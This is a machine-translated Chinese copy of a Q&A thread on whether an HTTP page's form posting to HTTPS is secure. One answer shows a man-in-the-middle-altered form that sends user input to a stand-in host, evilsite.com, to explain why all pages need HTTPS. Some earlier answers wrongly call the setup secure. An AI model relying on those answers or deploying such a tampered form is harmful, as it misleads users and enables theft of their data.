說我在http://mysite.com/form.html。當收視源,我看到如果我使用來自常規http頁面的<form action =「https」>,信息仍然是加密的嗎?
<form method="post" action="https://mysite.com/process">
<input type="text" name="user" value="information">
<input type="submit">
</form>
如果我打的提交按鈕,當它發送到進程頁/控制器形式的信息進行加密?
是 - 表單中的數據將使用SSL實施的常規握手進行加密發送。從那裏你可以選擇將你的用戶保持在SSL之下,或者使用會話標識符將其返回到標準連接。
這不安全。見[特洛伊亨特的帖子](http://www.troyhunt.com/2013/05/your-login-form-posts-to-https-but-you.html)。 – 2014-09-24 18:49:41
'這是安全的 - 不安全的是從HTTP頁面提交HTTPS表單。 MITM在這裏是一個明確的關注點,但是再次,關於HTTPS表單的MITM也是一個問題。雖然在視頻中提出的觀點是有建設性的,但是你傳達的方法卻不是。請嘗試在下一次添加更多單詞時使用單個評論,而不是多個評論,並減少單詞數量。此外,Sripathi Krishnan在四年前已經提出了這一點。感覺就像是一種死靈法,或者是博客的垃圾郵件,我們呢? – Seidr 2014-09-24 22:47:39
我會盡力在將來給出更好的評論。這篇文章是「https表單動作」的重要搜索結果,而且這種模式仍然很常見。 Sripathi Krishnan的回答較少投票,並不是公認的答案,但我認爲它應該是公認的答案。 – 2014-09-28 12:23:05
它將在較低的網絡級別(例如原始數據包,TCP,IP,以太網)上進行加密,而不是在應用級別上(因爲它在接收方側被透明解碼)。
當目標URL使用加密(如HTTPS)時,中間的男人看不到提交表單數據的純文本。
這不安全。見[特洛伊亨特的帖子](http://www.troyhunt.com/2013/05/your-login-form-posts-to-https-but-you.html)。 – 2014-09-24 18:50:31
是的,但請注意,培訓用戶在包含表單的頁面上查找SSL掛鎖已經付出了相當大的努力(無論培訓是否有效是另一回事)。一般來說,瀏覽器會抱怨如果一個安全頁面上的表單被提交給一個不安全的頁面,所以這種受過訓練的行爲確實有積極的意義。
如果你這樣執行你的表單,用戶將無法知道表單提交將是安全的(無需查看頁面代碼),直到他們點擊提交。這在你的用例中可能並不重要,但如果表單中的數據是用戶只需要安全地提交的,那麼這種做法就會違背培訓人們尋找掛鎖的企圖。
謝謝,這是一個好點! – John 2010-03-30 17:39:03
沒有。 「用戶將無法知道表單提交在他們提交之前是安全的」:它不會被安全傳輸!攻擊者可能已經注入了JavaScript鍵盤記錄或更改了表單操作。見[特洛伊亨特的帖子](http://www.troyhunt。COM/2013/05 /你的登錄表單,職位到HTTPS,但-you.html)。 – 2014-09-24 18:49:15
不能保證它會被加密,或者提交的數據將到達您的網站。
由於原始響應是通過http,中間人可能已經改變了您的html源代碼,或者可能已經插入了一些javascript來修改您的窗體的操作參數。因此,你的表格可以這樣寫的,當它到達瀏覽器
<form method="post" action="https://evilsite.com/process">
<input type="text" name="user" value="information">
<input type="submit">
</form>
這意味着,如果你想成爲安全,你必須使用HTTPS的所有網頁。
非常好的一點 – NibblyPig 2010-04-30 12:14:16
有趣的問題! – NibblyPig 2010-03-30 15:10:37